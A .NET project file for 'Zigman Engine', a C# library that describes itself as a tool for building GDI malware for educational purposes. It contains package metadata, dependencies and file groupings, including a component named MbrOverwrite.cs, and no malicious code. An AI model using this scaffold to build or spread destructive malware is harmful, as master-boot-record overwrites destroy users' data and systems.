<Project Sdk="Microsoft.NET.Sdk">

    <PropertyGroup>
        <TargetFramework>net6.0-windows</TargetFramework>
        <ImplicitUsings>enable</ImplicitUsings>
        <Nullable>enable</Nullable>
        <Title>Zigman Engine</Title>
        <Authors>TheAirBlow</Authors>
        <Version>1.0.0</Version>
        <Description>Zigman is a library to create GDI malware in C# without need to do payload and thread management by yourself. Note: Would warn the user about the malware. This is only for educational purposes.</Description>
        <Copyright>Copyright © TheAirBlow 2022 &lt;theairblow.help@gmail.com&gt;</Copyright>
        <PackageProjectUrl>https://github.com/TheAirBlow/Zigman/</PackageProjectUrl>
        <PackageLicenseUrl>https://github.com/TheAirBlow/Zigman/blob/main/LICENCE</PackageLicenseUrl>
        <RepositoryUrl>https://github.com/TheAirBlow/Zigman/</RepositoryUrl>
        <RepositoryType>git</RepositoryType>
        <PackageTags>gdi engine</PackageTags>
        <UseWindowsForms>True</UseWindowsForms>
    </PropertyGroup>

    <ItemGroup>
      <PackageReference Include="PInvoke.Kernel32" Version="0.7.104" />
      <PackageReference Include="PInvoke.User32" Version="0.7.104" />
      <PackageReference Include="Spectre.Console" Version="0.43.0" />
      <PackageReference Include="System.Windows.Extensions" Version="6.0.0" />
    </ItemGroup>

    <ItemGroup>
      <Compile Update="Wallpapers.cs">
        <DependentUpon>Payloads.cs</DependentUpon>
      </Compile>
      <Compile Update="MbrOverwrite.cs">
        <DependentUpon>Payloads.cs</DependentUpon>
      </Compile>
      <Compile Update="Invokes.cs">
        <DependentUpon>Payloads.cs</DependentUpon>
      </Compile>
    </ItemGroup>

</Project>
